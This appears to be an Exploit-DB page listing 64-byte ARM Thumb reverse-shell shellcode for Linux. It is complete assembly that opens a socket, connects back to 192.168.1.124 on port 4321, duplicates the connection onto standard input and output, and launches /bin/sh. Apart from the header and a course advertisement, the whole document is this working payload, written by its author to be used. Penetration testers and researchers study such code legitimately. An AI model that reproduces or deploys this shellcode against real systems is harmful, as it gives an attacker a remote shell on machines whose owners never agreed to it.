Linux/ARM - Reverse TCP (192.168.1.124:4321) Shell (/bin/sh) Shellcode (64 bytes)

EDB-ID:

46258

CVE:

N/A




Platform:

ARM

Date:

2019-01-28


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

/*
* Title:  Linux/ARM - Reverse_Shell Shellcode TCP (/bin/sh). Null free shellcode (60 bytes)
*Reverse shellcode for ARM 60 bytes-shortest ever till the date of creation
* Date:   2019-01-27
* Tested: armv7l (Raspberry Pi b3+)
* Author: Gokul Babu-https://www.linkedin.com/in/gokul-babu-452b3b112/
*/
 
/*socket 281, domain=2,type=1,protocol=0*/
/*connect 283,sockfd=resultant vaule r0=3,*addr=AF_inet+port+ip,addrlen=16bytes*/
/*dup2 63,oldfd=sockfd, newfd=0-stdin,1-stout,2-stderr*/
/*execve 11, *command="/bin/sh",0,0"*/
.section .text
.global _start
_start:
.ARM
	add r3,pc,#1
	bx r3
.THUMB
//socket:
	mov r0,#2
	mov r1,#1
	mov r7,#200
	add r7,#81
	svc #1
	push {r0,r1,r2} /*store all values r0=3,r1=1,r2=0*/
//connect:
	adr r1,exc+8 /*pointing to AF_Inet+PORT+IP*/
	strb r2,[r1,#1]
	mov r2,#16
	add r7,#2
	svc #1
//dup2:
//dup2(3,2)/*No need of stderr, program works fine without stderr*/
	pop {r0,r1,r2} /*Restoring all values as the values would have been changed after connect call*/
	mov r7,#63
//dup2(3,1)
	svc #1
//dup2(3,0) -> but gets changed to dup2(1,0)-see strace debug file for reference
	sub r1,#1
	svc #1
//execve:
	adr r0,exc
	strb r1,[r0,#7]
	mov r7,#11
	svc #1
exc:
        .ascii "/bin/shX"
//struct:
	.ascii "\x02\xff"
	.ascii "\x10\xE1" //port 4321
	.byte 192,168,1,124 //IP